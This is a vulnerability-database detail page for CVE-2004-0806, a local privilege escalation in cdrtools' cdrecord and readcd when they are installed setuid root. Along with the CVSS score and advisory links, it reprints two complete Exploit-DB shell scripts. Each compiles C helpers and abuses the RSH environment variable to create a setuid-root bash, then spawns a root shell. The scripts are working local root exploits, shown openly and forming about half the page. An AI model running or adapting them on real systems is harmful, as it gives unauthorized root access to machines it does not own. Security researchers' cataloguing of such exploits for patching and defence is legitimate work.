CVE-2004-0806 : Detail

CVE-2004-0806

0.06%V3
Local
2004-09-14
02h00 +00:00
2017-10-09
22h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

cdrecord in the cdrtools package before 2.01, when installed setuid root, does not properly drop privileges before executing a program specified in the RSH environment variable, which allows local users to gain privileges.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 438

Publication date : 2004-09-10 22h00 +00:00
Author : I)ruid
EDB Verified : Yes

#!/bin/bash # # cdrecord-suidshell.sh - I)ruid [CAU] (09.2004) # # Exploits cdrecord's exec() of $RSH before dropping privs # cat > ./cpbinbash.c << __EOF__ #include <stdio.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> main( int argc, char *argv[] ) { int fd1, fd2; int count; char buffer[1]; /* Set ID's */ setuid( geteuid() ); setgid( geteuid() ); /* Copy the shell */ if ((fd1=open( "/bin/bash", O_RDONLY))<0) return -1; if ((fd2=open( "./bash", O_WRONLY|O_CREAT))<0) return -1; while((count=read(fd1, buffer, 1))) write(fd2, buffer, count); free(buffer); close( fd1 ); close( fd2 ); /* Priv the shell */ chown( "./bash", geteuid(), geteuid() ); chmod( "./bash", 3565 ); } __EOF__ cc ./cpbinbash.c -o ./cpbinbash # Set up environment export RSHSAVE=$RSH export RSH=./cpbinbash # Sploit cdrecord dev= REMOTE:CAU:1,0,0 - # Cleanup rm cpbinbash* export RSH=$RSHSAVE export RSHSAVE= # Use our suid bash ./bash -p // milw0rm.com [2004-09-11]
Exploit Database EDB-ID : 469

Publication date : 2004-09-18 22h00 +00:00
Author : Max Vozeler
EDB Verified : Yes

#!/bin/bash echo "readcd-exp.sh -- ReadCD local exploit ( Test on cdrecord-2.01-0.a27.2mdk)" echo "Author : newbug [at] chroot.org" echo "Date :09.13.2004" echo "IRC : irc.chroot.org #discuss" export READCD=/usr/bin/readcd cd /tmp cat > s.c <<_EOF_ #include <unistd.h> #include <sys/types.h> #include <stdio.h> int main() { setuid(0);setgid(0); chown("/tmp/ss", 0, 0); chmod("/tmp/ss", 04755); return 0; } _EOF_ cat > ss.c <<_EOF_ #include <stdio.h> int main() { setuid(0);setgid(0); execl("/bin/bash","bash",(char *)0); return 0; } _EOF_ gcc -o s s.c gcc -o ss ss.c export RSH=/tmp/s $READCD dev=REMOTE:brk.chroot.org:1,0,1 1 >/dev/null 2>&1 /tmp/ss // milw0rm.com [2004-09-19]

Products Mentioned

Configuraton 0

Cdrtools>>Cdrecord >> Version 1.11

    Cdrtools>>Cdrecord >> Version 2.0

      References

      http://www.securityfocus.org/bid/11075
      Tags : vdb-entry, x_refsource_BID
      http://securitytracker.com/id?1011091
      Tags : vdb-entry, x_refsource_SECTRACK
      http://www.mandriva.com/security/advisories?name=MDKSA-2004:091
      Tags : vendor-advisory, x_refsource_MANDRAKE
      http://seclists.org/lists/bugtraq/2004/Sep/0097.html
      Tags : mailing-list, x_refsource_BUGTRAQ
      https://bugzilla.fedora.us/show_bug.cgi?id=2058
      Tags : vendor-advisory, x_refsource_FEDORA
      http://www.kb.cert.org/vuls/id/700326
      Tags : third-party-advisory, x_refsource_CERT-VN
      http://secunia.com/advisories/19532
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://secunia.com/advisories/12481/
      Tags : third-party-advisory, x_refsource_SECUNIA